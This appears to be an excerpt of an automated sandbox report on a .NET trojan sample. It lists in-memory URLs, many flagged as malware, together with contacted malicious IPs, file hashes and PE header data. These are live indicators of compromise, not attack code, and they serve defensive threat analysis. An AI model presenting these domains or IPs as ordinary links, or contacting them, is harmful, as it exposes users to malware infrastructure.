                          https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exeexplorer.exe, 00000004.00000000.2081190838.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4544685051.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                            high
                            http://www.alnawrasalrahhal.com/bp31/www.tqmsn.comexplorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.fixerradvisory.com/bp31/www.millerstoehr.comexplorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: malware
                            unknown
                            http://www.bolfm.com/bp31/explorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: malware
                            unknown
                            http://www.piabellacasino347.comexplorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.tqmsn.comReferer:explorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameUgHXEfw1uL.exe, 00000000.00000002.2071512446.0000000002B51000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://www.cascadefinnish.comReferer:explorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.millerstoehr.comReferer:explorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.darkpinefarm.com/bp31/explorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: malware
                              unknown
                              https://wns.windows.com/)sexplorer.exe, 00000004.00000002.4540698292.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2078672674.00000000099C0000.00000004.00000001.00020000.00000000.sdmpfalse
                                high
                                http://www.adminonlinechecker.onlineReferer:explorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.cascadefinnish.comexplorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.videopromarket.comexplorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.cascadefinnish.com/bp31/www.alnawrasalrahhal.comexplorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: malware
                                unknown
                                http://www.darkpinefarm.comexplorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.cascadefinnish.com/bp31/explorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: malware
                                unknown
                                https://outlook.comexplorer.exe, 00000004.00000002.4541926212.0000000009C96000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2078672674.0000000009B41000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3094161101.0000000009BB2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841493381.0000000009C92000.00000004.00000001.00020000.00000000.sdmpfalse
                                  high
                                  http://tempuri.org/Database1DataSet.xsdexplorer.exe, 00000004.00000002.4548710520.00000000108CF000.00000004.80000000.00040000.00000000.sdmp, control.exe, 00000005.00000002.4531735884.0000000002EDB000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000005.00000002.4533179411.000000000526F000.00000004.10000000.00040000.00000000.sdmp, UgHXEfw1uL.exefalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.fixerradvisory.comexplorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.alnawrasalrahhal.comexplorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.darkpinefarm.com/bp31/www.adminonlinechecker.onlineexplorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: malware
                                  unknown
                                  http://www.millerstoehr.com/bp31/explorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: malware
                                  unknown
                                  http://www.alnawrasalrahhal.comReferer:explorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.videopromarket.com/bp31/www.turdfi.xyzexplorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.adminonlinechecker.online/bp31/explorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: malware
                                  unknown
                                  http://www.fnb.gay/bp31/www.fixerradvisory.comexplorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: malware
                                  unknown
                                  https://android.notify.windows.com/iOSexplorer.exe, 00000004.00000003.3095509048.00000000076F8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2076988061.00000000076F8000.00000004.00000001.00020000.00000000.sdmpfalse
                                    high
                                    http://www.biddrivego.com/bp31/explorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: malware
                                    unknown
                                    http://www.spitzpr-gq.info/bp31/www.piabellacasino347.comexplorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.bolfm.com/bp31/www.videopromarket.comexplorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: malware
                                    unknown
                                    http://www.fnb.gay/&Ocontrol.exe, 00000005.00000002.4532013045.0000000003112000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.bolfm.comexplorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.piabellacasino347.com/bp31/www.darkpinefarm.comexplorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: malware
                                    unknown
                                    https://api.msn.com/explorer.exe, 00000004.00000002.4540698292.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2078672674.0000000009ADB000.00000004.00000001.00020000.00000000.sdmpfalse
                                      high
                                      http://www.millerstoehr.com/bp31/www.bolfm.comexplorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: malware
                                      unknown
                                      http://www.gchzwf.comReferer:explorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.piabellacasino347.com/bp31/explorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: malware
                                      unknown
                                      http://crl.vexplorer.exe, 00000004.00000002.4531444837.0000000000F13000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2075184468.0000000000F13000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.biddrivego.com/bp31/www.cascadefinnish.comexplorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: malware
                                      unknown
                                      http://www.spitzpr-gq.infoexplorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      IP | Domain | Country | ASN | ASN Name | Malicious
                                      172.67.198.102 | www.tqmsn.com | United States | 13335 | CLOUDFLARENETUS | true
                                      130.61.77.41 | www.fnb.gay | United States | 31898 | ORACLE-BMC-31898US | true
                                      195.35.38.7 | alnawrasalrahhal.com | Germany | 8359 | MTSRU | true
                                      3.33.130.190 | millerstoehr.com | United States | 8987 | AMAZONEXPANSIONGB | true
                                      103.224.212.216 | www.biddrivego.com | Australia | 133618 | TRELLIAN-AS-APTrellianPtyLimitedAU | true
                                      Joe Sandbox Version:38.0.0 Ammolite
                                      Analysis ID:1348466
                                      Start date and time:2023-11-27 12:08:14 +01:00
                                      Joe Sandbox Product:CloudBasic
                                      Overall analysis duration:0h 11m 51s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Number of analysed new started processes analysed:9
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:1
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample file name:UgHXEfw1uL.exe
                                      renamed because original name is a hash value
                                      Original Sample Name:e8fc0040e6882e0b9ea0e830b6d74d65.exe
                                      Detection:MAL
                                      Classification:mal100.troj.evad.winEXE@53/1@12/5
                                      EGA Information:
                                      • Successful, ratio: 100%
                                      HCA Information:
                                      • Successful, ratio: 100%
                                      • Number of executed functions: 216
                                      • Number of non-executed functions: 293
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe
                                      • Override analysis time to 240000 for current running targets taking high CPU consumption
                                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                      • Not all processes where analyzed, report is missing behavior information
                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                      • Report size getting too big, too many NtEnumerateKey calls found.
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                      Time | Type | Description
                                      12:09:05 | API Interceptor | 19x Sleep call for process: UgHXEfw1uL.exe modified
                                      12:09:13 | API Interceptor | 7173419x Sleep call for process: explorer.exe modified
                                      12:09:59 | API Interceptor | 7115270x Sleep call for process: control.exe modified
                                        Process:C:\Users\user\Desktop\UgHXEfw1uL.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):1415
                                        Entropy (8bit):5.352427679901606
                                        Encrypted:false
                                        SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPE4KMRaKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPHKMRatHo6hAH4
                                        MD5:97AD91F1C1F572C945DA12233082171D
                                        SHA1:D5E33DDAB37E32E416FC40419FB26B3C0563519D
                                        SHA-256:3F64591E0447E6F5034BC69A8A8D4C7ED36DAC5FE1E408401AE1B98F0D915F7E
                                        SHA-512:8FAEED342DADC17571F711DDC1BE67C79A51CA5BD56B5DA13E472ED45FC4EC6F1DC704BA92E81E97F5ECFD73F3D88F9B9CD9AE4EADDF993BFF826627215FBBCE
                                        Malicious:false
                                        Reputation:moderate, very likely benign file
                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Data\1b8c564fd69668e6e62d136259980d9e\System.Data.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fc
                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Entropy (8bit):7.8011036228862345
                                        TrID:
                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                        • Win32 Executable (generic) a (10002005/4) 49.78%
                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                        • DOS Executable Generic (2002/1) 0.01%
                                        File name:UgHXEfw1uL.exe
                                        File size:793'600 bytes
                                        MD5:e8fc0040e6882e0b9ea0e830b6d74d65
                                        SHA1:fb0b39b5f5c570c83b37a62a7b1563a48aefe2c4
                                        SHA256:685107cecf3e5ac7ad43e40a9fc7d8ea35179a40973938ff74e5813d0a61dffc
                                        SHA512:3082e92b4b1760b502d957c0017da96ee37801aad4ef1207947414c8d9fddd6748fcbd869006b0fa1ea6f1fda81c37eea1a0569f5ca28318b959ac40ebc08207
                                        SSDEEP:24576:kMVhudlFyhriuxuk69+DdDpFBjcGYfpBhtD/:DuX4Uux569e53Y3
                                        TLSH:FAF41269A5AC5BC7E17F43FA1A60D00583B16C39A432E30EACC1B5DB69B0F815770B5B
                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l3de..............0.................. ...@....@.. ....................................@................................
                                        Icon Hash:00928e8e8686b000
                                        Entrypoint:0x4c2ea2
                                        Entrypoint Section:.text
                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                        Time Stamp:0x6564336C [Mon Nov 27 06:13:00 2023 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:
                                        OS Version Major:4
                                        OS Version Minor:0
                                        File Version Major:4
                                        File Version Minor:0
                                        Subsystem Version Major:4
                                        Subsystem Version Minor:0
                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                        Instruction
                                        jmp dword ptr [00402000h]
                                        add byte ptr [eax], al
                                        Name | Virtual Address | Virtual Size | Is in Section
                                        IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_IMPORT | 0xc2e4f | 0x4f | .text
                                        IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc4000 | 0x610 | .rsrc
                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xc6000 | 0xc | .reloc
                                        IMAGE_DIRECTORY_ENTRY_DEBUG | 0xc0884 | 0x54 | .text
                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
